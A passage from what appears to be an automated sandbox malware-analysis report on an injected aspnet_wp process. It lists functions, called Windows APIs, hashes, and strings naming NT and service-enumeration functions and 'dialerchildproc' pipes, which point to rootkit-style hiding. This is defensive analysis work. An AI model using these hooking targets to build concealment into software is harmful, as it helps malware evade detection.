475->474 476->463 486 2109c3c54d0 477->486 487 2109c3c54d2 477->487 478->463 479->466 488 2109c3c55c8-2109c3c5661 call 2109c3c4510 call 2109c3c4470 VirtualProtect 480->488 489 2109c3c55bb-2109c3c55c3 480->489 481->480 486->463 487->462 494 2109c3c5671-2109c3c56d1 488->494 495 2109c3c5663-2109c3c5668 GetLastError 488->495 494->418 495->494
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                                                            • Opcode ID: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                                                            • Instruction ID: 24840e69cd93c011ce3e72b707be1eabc0946bd58d86859d3288f3e2201345f5
                                                                                                                                                                                            • Opcode Fuzzy Hash: a9eeae0eee8a65d3360f20c0190c6c2044be682fe56af66e10426f66e33a6bd7
                                                                                                                                                                                            • Instruction Fuzzy Hash: CF02EB32659B88C6D760CB55E5A439EB7A0F3D4B84F108015EACE97B6ADFBCC584DB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C1268 Relevance: 5.0, APIs: 4, Instructions: 21memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                                                            • Opcode ID: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                            • Instruction ID: 6b103352dd55cb133f9c3f2a96f31855e3c0d2f1cc38eb6e586a7410d9fea862
                                                                                                                                                                                            • Opcode Fuzzy Hash: baed807eea30b690d22ace55785552a5eee2cb9bee48e50401e6fb7d80347597
                                                                                                                                                                                            • Instruction Fuzzy Hash: C4E09235A01A08C6EB048FA2D96C38A36F1FB9DF06F04C424C91A07392DFBD85D9C790
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C1000 Relevance: 5.0, APIs: 4, Instructions: 20memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1617791916-0
                                                                                                                                                                                            • Opcode ID: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                                                                                                                                                            • Instruction ID: 5636117db3786a5ad76de4ba2fc3cc9a821f70c97e864d3b14f7c4560fa6c458
                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b325dc3880ca3c93f8f4c7f4460fba72f6c1ea06a067b14687c409243df247f
                                                                                                                                                                                            • Instruction Fuzzy Hash: E4E09275A11A08C3EB088FA2D95838A32F1FB9DF02F44C420C91A07352DE7C85D4C750
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C39E0 Relevance: 4.6, APIs: 3, Instructions: 64memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Virtual$AllocQuery
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 31662377-0
                                                                                                                                                                                            • Opcode ID: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                                                                            • Instruction ID: b8408d63b71b1d372afc6063578280dccac620429a7acbcd838f522fc56a4c48
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad31f8c641c3994e4c662b42b06090e17ab0b09933d29211a4965d6dca603ca4
                                                                                                                                                                                            • Instruction Fuzzy Hash: 60317535A59A88C1EBB0DA15E1E93DE6690F39CB84F10C515E9CD1679ADFBCC3D08B00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C328C Relevance: 4.5, APIs: 3, Instructions: 43threadCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1683269324-0
                                                                                                                                                                                            • Opcode ID: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                            • Instruction ID: 4162c76380d16316a4cefda63d937e39a7db4410b84b0c06e1e53d5441365e1d
                                                                                                                                                                                            • Opcode Fuzzy Hash: c94412c55dcd243bcd3fbe265bea19663896af10ab27123b85acb7154d5eea14
                                                                                                                                                                                            • Instruction Fuzzy Hash: A1112E71E54648C2F7A0A721EAEE3DD2294A778B45F50C1249DA692593EFFAC2D48600
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C4DF0 Relevance: 4.5, APIs: 3, Instructions: 23memoryCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3733156554-0
                                                                                                                                                                                            • Opcode ID: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                                                                                            • Instruction ID: 8049537c87372a4b2a9fd7dfb1c4c2afcd47dd3afa06d12a744154827f3898af
                                                                                                                                                                                            • Opcode Fuzzy Hash: efc513032ac2f8104d68ff6d1779eae6f51007478eb3e1ac0120cc0a77f626c8
                                                                                                                                                                                            • Instruction Fuzzy Hash: F1F01D36658E08C0D630DB15E5A839EABA0E398BD4F14C111FECD03B6ACE7CC6C08B10
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CF948 Relevance: 3.1, APIs: 2, Instructions: 71COMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            • Executed
                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                            control_flow_graph 673 2109c3cf948-2109c3cf963 674 2109c3cf966-2109c3cf98f 673->674 675 2109c3cf99b-2109c3cf9a4 674->675 676 2109c3cf991-2109c3cf996 674->676 678 2109c3cf9bc 675->678 679 2109c3cf9a6-2109c3cf9a9 675->679 677 2109c3cfa26-2109c3cfa2f 676->677 677->674 680 2109c3cfa35-2109c3cfa4f 677->680 683 2109c3cf9c1-2109c3cf9d2 GetStdHandle 678->683 681 2109c3cf9ab-2109c3cf9b3 679->681 682 2109c3cf9b5-2109c3cf9ba 679->682 681->683 682->683 684 2109c3cf9d4-2109c3cf9df GetFileType 683->684 685 2109c3cfa01-2109c3cfa19 683->685 684->685 686 2109c3cf9e1-2109c3cf9ec 684->686 685->677 687 2109c3cfa1b-2109c3cfa1f 685->687 688 2109c3cf9ee-2109c3cf9f3 686->688 689 2109c3cf9f5-2109c3cf9f8 686->689 687->677 688->677 689->677 690 2109c3cf9fa-2109c3cf9ff 689->690 690->677
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: FileHandleType
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3000768030-0
                                                                                                                                                                                            • Opcode ID: a07d0c2e6d1ea39fb6922406f7202b79799826504b1902530f517849248bbcbd
                                                                                                                                                                                            • Instruction ID: 7ca2daa701dfb1424692fc8bffa9c8f55f18279e0d0d6e733a385130b861c268
                                                                                                                                                                                            • Opcode Fuzzy Hash: a07d0c2e6d1ea39fb6922406f7202b79799826504b1902530f517849248bbcbd
                                                                                                                                                                                            • Instruction Fuzzy Hash: EB31C932A50B48D1DB608B1996E42AC6660F359FB0F64D309DFAA173E2CB74D6E1C700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C1ABC Relevance: 3.1, APIs: 2, Instructions: 68sleepCOMMON
                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                            APIs
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: GetProcessHeap.KERNEL32 ref: 000002109C3C1633
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: HeapAlloc.KERNEL32 ref: 000002109C3C1642
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C16B2
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C16DF
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C16F9
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C1719
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C1734
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C1754
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C176F
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C178F
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C17AA
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C17CA
                                                                                                                                                                                            • Sleep.KERNEL32 ref: 000002109C3C1AD7
                                                                                                                                                                                            • SleepEx.KERNEL32 ref: 000002109C3C1ADD
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C17E5
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C1805
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C1820
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C1840
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C185B
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegOpenKeyExW.ADVAPI32 ref: 000002109C3C187B
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C1896
                                                                                                                                                                                              • Part of subcall function 000002109C3C1628: RegCloseKey.ADVAPI32 ref: 000002109C3C18A0
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1534210851-0
                                                                                                                                                                                            • Opcode ID: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                            • Instruction ID: f105ee5ba4e51af745b969720ca2b1ab65376c4be8228b0ce4769b814451057c
                                                                                                                                                                                            • Opcode Fuzzy Hash: ad614115fa5d2181ccf7742c52f053f5bbac07b16a2f1961ccdf1ed8f9939afa
                                                                                                                                                                                            • Instruction Fuzzy Hash: FB312171A4060DC2EB509B22D7E83ED73A4AB74FD0F04D4218E89972A7EFA4C6D19610
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C39273C Relevance: 1.4, APIs: 1, Instructions: 187memoryCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                                            • Opcode ID: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                            • Instruction ID: f08a9f962b62c119bd2ca5b9cc15a5a05d12ccbbb99f18b1bd2ca70c3e7d25b8
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c1c9448f3dd1088c887dafc1273d9eb4da1e6d2ce59199f574756fa2a1f07a1
                                                                                                                                                                                            • Instruction Fuzzy Hash: 78612632F01A98C7DB58CF1692A47AD7392F764F94F18C121DE590378BDAB5D9A2CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                                            Function 000002109C3C7D90 Relevance: 10.6, APIs: 7, Instructions: 72COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 3140674995-0
                                                                                                                                                                                            • Opcode ID: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                            • Instruction ID: ab0f1dc52411289cee16995b1f2d8b563d053e235c9c7fc50a19ef4523aa46e5
                                                                                                                                                                                            • Opcode Fuzzy Hash: 781d1b9bde8934adc12bfa83d35ad1be64d2520f1bd2f9e02f1b4bb1ea1a0257
                                                                                                                                                                                            • Instruction Fuzzy Hash: 2D315E72605B84CAEB609F60E8A43ED7370F795B44F44C42ADA8E57B95EF78C688C710
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CD2A4 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 1239891234-0
                                                                                                                                                                                            • Opcode ID: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                            • Instruction ID: 19548e0cd8a0e23a0620e6c5536f7f3a94ce45537b2a00a7c14e69701c4b558c
                                                                                                                                                                                            • Opcode Fuzzy Hash: 056b8809331e045eb0ff6df28b8a67c6be047fb713c0be5e5acd4a9b147221bc
                                                                                                                                                                                            • Instruction Fuzzy Hash: B7318132614B84C6EB60CF25E9943DE73A0F799B54F508115EE9D53BAADF78C285CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C12BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                            • String ID: d
                                                                                                                                                                                            • API String ID: 2005889112-2564639436
                                                                                                                                                                                            • Opcode ID: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                            • Instruction ID: eab3bb141fd860bbdc60974ba91bf1211d4e6e0e6344aa9b65f1b2396bbb7a20
                                                                                                                                                                                            • Opcode Fuzzy Hash: 8b653d2a3574a9b9f54f76d34c9bbade1314fe17b6e977058bb62b7e32ce9810
                                                                                                                                                                                            • Instruction Fuzzy Hash: A9514B32A00B88C6E750CF62E69839A77B1F799F85F04C124DE5A07759DF7CC2858740
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C1D14 Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                            • API String ID: 4175298099-1975688563
                                                                                                                                                                                            • Opcode ID: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                            • Instruction ID: 6af3f6a388bcb0745f1af5c5d4bc3250af33f9e0aed376e96fa32c5709d3ee11
                                                                                                                                                                                            • Opcode Fuzzy Hash: 848021bf4701eae64bbfc749c93af06548ec6c37c79a2989ab503d46e0816dd6
                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F318C74980A4ED1FA04EF66EAF97D83320A724F44F80C113D89A235679EF983C9D350
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C396910 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 230COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3897320165.000002109C390000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002109C390000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c390000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                                                                                                                                                                            • String ID: `dynamic initializer for '$`eh vector copy constructor iterator'$`eh vector vbase copy constructor iterator'$scriptor'
                                                                                                                                                                                            • API String ID: 190073905-1786718095
                                                                                                                                                                                            • Opcode ID: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction ID: 0c73925b3608389dbc6d09ce86247c8be8b21902ac3fa7d1a31a43f0f0a6a525
                                                                                                                                                                                            • Opcode Fuzzy Hash: 0257f947f8d22f27d89668d16c5c48cc6f3519c7a2ac610662f1932688afbc32
                                                                                                                                                                                            • Instruction Fuzzy Hash: 0681E171E0260DC6FA90AB2697F93D962B0A7B6FC0F44C025A94547797DBF8CBC58700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3CCE28 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 000002109C3CCE37
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCE4C
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCE6D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCE9A
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCEAB
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCEBC
                                                                                                                                                                                            • SetLastError.KERNEL32 ref: 000002109C3CCED7
                                                                                                                                                                                            • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCF0D
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,00000001,000002109C3CECCC,?,?,?,?,000002109C3CBF9F,?,?,?,?,?,000002109C3C7AB0), ref: 000002109C3CCF2C
                                                                                                                                                                                              • Part of subcall function 000002109C3CD6CC: HeapAlloc.KERNEL32 ref: 000002109C3CD721
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCF54
                                                                                                                                                                                              • Part of subcall function 000002109C3CD744: HeapFree.KERNEL32 ref: 000002109C3CD75A
                                                                                                                                                                                              • Part of subcall function 000002109C3CD744: GetLastError.KERNEL32 ref: 000002109C3CD764
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCF65
                                                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,000002109C3D0A6B,?,?,?,000002109C3D045C,?,?,?,000002109C3CC84F), ref: 000002109C3CCF76
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                            • String ID:
                                                                                                                                                                                            • API String ID: 570795689-0
                                                                                                                                                                                            • Opcode ID: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                            • Instruction ID: da877fc6b6af2991666b99c9248495b749d380c74e30e8ca76d2f4e2a923e8a3
                                                                                                                                                                                            • Opcode Fuzzy Hash: 3a29360f60df60adecaf4649f79764fa540e3f9fdfe76bc69ae0b48c7fce8efe
                                                                                                                                                                                            • Instruction Fuzzy Hash: 82415F30A8024CC2FA68A73567FD3ED22415B75FB0F24C724ACB6266D7DAA887D18700
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C3C2244 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                            • Source File: 0000000C.00000002.3898771335.000002109C3C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000002109C3C0000, based on PE: true
                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                            • Snapshot File: hcaresult_12_2_2109c3c0000_aspnet_wp.jbxd
                                                                                                                                                                                            Similarity
                                                                                                                                                                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                                                                                                                                                                            • API String ID: 2171963597-1373409510
                                                                                                                                                                                            • Opcode ID: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                            • Instruction ID: 2f84538e6c4310b5db22ea6463295b6c470a5c2b9fa4b51e3c316d545ef85e30
                                                                                                                                                                                            • Opcode Fuzzy Hash: d76f145db3bc14c8b60d6abb5b011cd5988a1ad04fc2d4b7169b2a78ec3c4c79
                                                                                                                                                                                            • Instruction Fuzzy Hash: 34213271A14644C3F7109B25F59839973B0F795B94F54C215DA6A03AE5CFBDC285CB00
                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                            Function 000002109C399944 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                            APIs
                                                                                                                                                                                            Strings
                                                                                                                                                                                            Memory Dump Source
